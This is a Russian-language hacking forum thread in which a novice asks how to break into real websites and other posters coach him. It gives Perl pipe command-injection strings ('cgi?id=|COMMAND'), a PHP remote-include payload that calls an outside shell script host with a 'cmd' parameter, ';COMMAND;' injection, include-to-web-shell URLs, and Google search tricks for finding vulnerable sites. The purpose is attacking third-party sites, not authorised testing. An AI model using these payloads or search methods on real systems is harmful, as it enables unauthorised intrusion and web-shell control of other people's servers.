Братва... я знаю, что я оооочень тупой и мне до вас далеко... но я хочу понять фсё эт... дык.. у мну трабл вот такой... см тему... куда надо (или вместо чего) нужно написать |id| или другие команды в, примерно, такой строчке: .... cgi?id=103 .... или .... php?t=filename .... и где большая вероятность бага? я пробывал ооочень много... и туда впихиавл.. и туда.. везде.. и не только одну команду.. каждый вечер у меня уходит часа по 3 на поиск бажного сайта... ну ничего не получается.. не нахожу... Кстати... о поиске.... чтоб найти в гугле определённое значене в УРЛе, нада зделать так: filetype: cgi pl html site: .ru (попрвате плииизз, еси я не прав... он должен мне выдать сайты, где встречается ИЛИ cgi ИЛИ перловские файты\скрипты и хтмл и обязательно тока с доменом 3-ого уровня .ru ) какие ещё есть конады для поиска в ггууггллее ?
ну к примеру сайт, где в адресной строке браузера присутствует "cgi?p=filename" b ljgecnbv? xnj, ,sk cfqn c www.*****.****.RU !!!
Это совершенно разные типы уязвимостей. id=103 - здесь скорее всего может встретится SQL-инъекция а здесь php?t=filename - PHP инъекция.
Algol оо.. спасибки... вот допустим у меня попались такие две вещи... (на разных сайтах ессенно) cgi?id=103 чтоб проверить выполняемость команд (толком в ДЕЙСТВИИ видел тока |id| поэтому юзаю в начале тока её) мне надо зделать: cgi?id=|id| или cgi?|id|=103 ? а вот в php?t=filename чтоб просмотреть права нада именно значение переменной измненить на ";id;" так???
В перловых скриптах есть некоторые фичи ... Например, пайп(Символ | ), который открывает аргумент функции не для чтения, а для испонения, что дает возможность использовать этот скрипт, как web-шелл ... Если в этой переменной id не проверяются входные параметры, то по идее синтаксис команд должен быть таков: Code: cgi?id=|ТУТ_ИДЕТ_КОМАНДА Как сказал алгол, в этом случае возможна php-инъекция: Code: php?t=filename Использовать это можно использовать так: Code: php?t=http://xssteam.narod.ru/conf.php&cmd=КОМАНДА Но прокатит это только в том случае, если возможен удаленный инклуд ...
ооо.. Чегевар =)) спасибо большое!!!!!!!!!!!!!!!!!!! кстати... http://xssteam.narod.ru/conf.php -это реальный сайт? т.е. он работающий?
Чегевар... дык.. эта.. есть кучу вопросик... те можно в аську? или лучше тут? ну вопросы конкретные есть... или лучше тут?
ОК! как ты ищешь сайт с багом? (не корректный вопрос похоже...) лана... как юзать гугл, чтоб найти ТО что мне нужно? ну там "filetype: xxxx" или что ещё есть такое?
если какие-нить скриншоты при ВЫПОЛНЕННЫХ различных командах таких как, id, ls, cd, cp и т.д. ??? просто я хочу научится с маленького взлома.. а дальше по нарастающей... чтоб мелочей не упустить!
Короч, чтобы найти быжные сайты с пхп-инклудом, нужна искать по так: php в конце можно заменить на htm, html, inc, dat. Для более точного поиска, можно фоспользоваться такими строками: " Для поиска скуль-инж. тоже самое, только меняем переменную page на id и т.д... PS а че хочешь домены 3-его уровня, боишься?
Блин, а я балван искал эти долбанные пайпы в Php-скриптах. А есть какие-нить фичи в Php скриптах, чтоб ёб-шелл выполнялся?
В пхп есть такая фича как ;КОМАНДА; исчо часто встречается инклуд типа index.php?page=(тут вбивай путь до шелла)
ну подставляй вместо какой нибудь переменной хотя как сказал Fr1k такое щас мало где найдёшь . Щас чаще бажные скрипты cgi
